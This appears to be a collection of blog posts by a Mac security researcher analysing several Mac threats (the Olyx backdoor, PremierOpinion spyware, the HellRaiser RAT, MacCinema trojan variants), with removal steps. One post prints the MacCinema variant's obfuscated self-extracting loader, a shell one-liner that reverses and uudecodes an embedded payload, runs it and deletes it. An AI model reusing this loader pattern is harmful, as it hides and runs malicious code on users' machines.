In my last blog post, I’ve discussed the early features of RAT ‘Blackhole’. Although, it was then in its early stage, I find this type of offensive development interesting due to the fact that they emerge and distribute as a hacking tool, with functional backdoor client-server mechanism.
Last month, we have spotted a new piece of malware, a backdoor server called ‘Olyx’. The file is a Mach-O binary and the traces of the working directory suggest that the Mac user name is ‘yxl’. So, this is where the name ‘Olyx’ came.
Backdoor ‘Olyx’ was spotted in a package called ‘PortalCurrent events-2009 July 5.rar”, where the content suggest that it was extracted from Wikipedia community portal current events 2009 July 5 page. If you will visit the Wikipedia current events 2009 July 5 page, and compare the screenshot below, you’ll find it very similar.
However, the extracted page includes a folder which contains photos of the 2011 June 15th protest in Athens, Greece and alongside the two malicious binary executable:
There’s another folder called ‘Photo-Current events 2009 July 5’, which contains 21 (disturbing) photos.
Q: So, the question now is, what happened on ‘2009 July 5’ ?
The World Uyghur Congress website describes it,
On 5 July 2009, Uyghurs in Urumqi, the capital of East Turkestan, staged a peaceful protest which was suppressed by Chinese security forces and subsequently led to ethnic unrest in the city that left hundreds of people dead.
Q: Ok, that was 2 years ago right?
Yes, and in a press released titled “Worldwide Uyghur Protests on Second Anniversary of 5 July 2009″ describes the present,
On July 5, 2011 and in the days surrounding July 5th, the WUC called the Uyghurs in exile and their supporters around the globe to stage demonstrations and other actions to commemorate the second anniversary of one of the saddest and most tragic days in the history of the Uyghur people and of East Turkestan and to ensure that the world does not forget about the devastating plight of the Uyghur people.
So, there’s a call for an organized demonstration to remind the whole world of the 2009 event, and in support for Uyghur’s human rights and freedom.
Q: What’s the protest? This Facebook invitation page explains,
Approaching the second anniversary of these events, and despite international calls, no independent investigation into the incident has been allowed by the Chinese authorities and the number of people killed, detained, imprisoned, executed and disappeared remains unclear.
The activities surrounding this protest clearly took place in the cyberspace, resulting to attacks as described in press released titled World Uyghur Congress (WUC) Victim of DDoS Cyber Attacks,
Approaching the second anniversary of the 5 July 2009 events, the World Uyghur Congress (WUC) has again been the victim of cyber attacks.
So, how do you think Backdoor ‘Olyx’ fits in this picture?
The discovery of this threat should remind Mac users to carefully consider security and the real-life consequences of getting pwned. Remember, this type of threats are on the mission, and this is not cybercriminal that monetize infection nor steals money.
1) Kill the running process.
Using spotlight, type-in Activity Monitor and filter by searching starfieldUpdate and click Quit Process. Then, search offSyncService and click Quit Process.
If using Terminal, you may run the following command:
2) Delete Starfield internet plugins and components.
Using Terminal, you may run the following command:
3) It will require root password to remove the following files.
This instruction removes all the traces of Starfield. Stay safe!
**Note: If you find Starfield application useful, you may keep the ‘WBE Desktop Notified.App’ and ‘DesktopTools.App’.
From Intego security advisory today:
Description: Intego has discovered a spyware application that is installed by a number of freely distributed Mac applications and screen savers found on a variety of websites.
PremierOpinion is part of an online market research community with over 2 million members worldwide. PremierOpinion relies on its members to gain valuable insight into Internet trends and behavior. In exchange for participating in periodic surveys on topics of interest to the Internet community, and for having their Internet browsing and purchasing activity monitored, PremierOpinion sponsors select software that its members can enjoy for free.
So, who’s the partner?
“PremierOpinion” Mac OS X Spyware are distributed by 7art-screensavers and published in this link: http://7art-screensavers.com/Mac_OS_X.shtml
Intego blog published detailed list of “PremierOpinion” Mac OS X Spyware.[here]
There are 48 screensaver Mac OS X apps in this source, and there are two different packages.
How to spot “PremierOpinion” Mac OS X Spyware?
1. It uses IzPack “Package once. Deploy everywhere.” software installer generator. You’ll notice from a package inspection (press control+click on the application and from the pop-up menu choose ‘Show Package Contents’), the icons are different – 7art while the other izpack.icns.
2. IzPack generated installers are in Java Archive (.JAR) file.
3. 7art screen savers installation do NOT require root password. While, PremierOpinion sponsored free software or application requires root password. Why? Because it installs spyware, which will track and monitor users’ browsing behaviour, scans and gather information from the disk and sends back to its remote server. This is very persistent spyware, meaning it does NOT want to be uninstalled.
4. Spyware installs software without user’s consent or notification. It is often bundled with other clean application to misleads users of its true purpose and gain access to users’ system. So, in this case, if you click “Cancel”, the IzPack installer will still continue by two pop-up screen: 1) PremierOpinion survey (screenshot) 2) 7art screen saver installation (screenshot).
“Package once. Deploy everywhere.”
This sneaky Mac OS X threat could be everywhere bundled and distributed in the internet.
Be cautious and stay safe!
——–> Threat Info FYI
File Name: poinstaller
File Type: Mach-O executable i386
File Size: 470,352 bytes
Threat Type: Backdoor, Downloader, Sniffer, Stealer,
Installation Requirement: root
Remote Activity: Installation of other threats
Remote Download File: Rule14.xml
Remote Download: PermissionResearch.zip
File Type: Mach-O executable i386
RAT for Mac?
When there’s too much RAT (Remote Administration Tool) available for Windows, people wonder if there’s good and useful RAT for Mac as well.
The search and discussions about this topic goes on and on; at one point an online poll favored to continue the development:
A useful description of RATs that works in OSX can be found here.
The most recent/updated development is HellRaiser version 4.2,
coded by DCHKG an Underground Mac Programming Team.
HellRaiser includes a configuration component, where the remote controller can specify the server parameters.
The server component is the application distributed to target OS X user. It requires manual execution to install and enable the server to run in background (hidden from dock). Once successful, the server component (or the slave) will report back to the master as shown below.
How would I know if HellRaiser server is installed/running?
option 1: You may open network utility and activity monitor (/Applications/Utilities/) and kill the process.
option 2: You may open terminal, and type
lsof -i (this will list running processes and its matching network/internet connection). Search dubious name and internet connection, take note of the PID, and in terminal type
kill -9 <PID> (this will kill the process).
If you’re using Mac security scanner, then it’s best time to check for signature update! (most vendors detects this as OSX HellRTS)
Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.
The script looks like this:
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.
Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.
…while other links to Mac videos like this PornTube below.
There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.
A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once you execute it, it will still display MacCinema installer. However, few modification was found in preinstall & preupgrade scripts as shown in Figure 01.
Obviously, attackers are trying to maximize these threats. The obfuscated data will extract another script, which we already seen it from previous variant.
This Trojan has been in-the-wild for months now and as it continuously proliferates in the internet, new Macintosh users are often found falling into its tricks.
Stay away from this threat!
Another modified version of “MacCinema” promising as a crack version of “Avid.Xpress.Pro.5.7.2.dmg”.
This variant was recently added by MacScan, if you’re using it – do a regular check here -> http://macscan.securemac.com/spyware-list
Also, recently blogged by Intego @ http://blog.intego.com/
What’s new? Nothing really except this few strings “yksrepsak 777 nigeb”
…which means, “begin 777 kaspersky”.
“enialbdivad 777 nigeb” remains the same as discussed from the previous post “Latest Threat: MacCinema“.
The bottom line here is that these threats are active and in-the-wild. It is trying to play hide-n-seek with security scanners by applying obfuscation and changing few strings.
To remove this threat, just follow MacAccess removal instruction.
Stay alert and always be informed!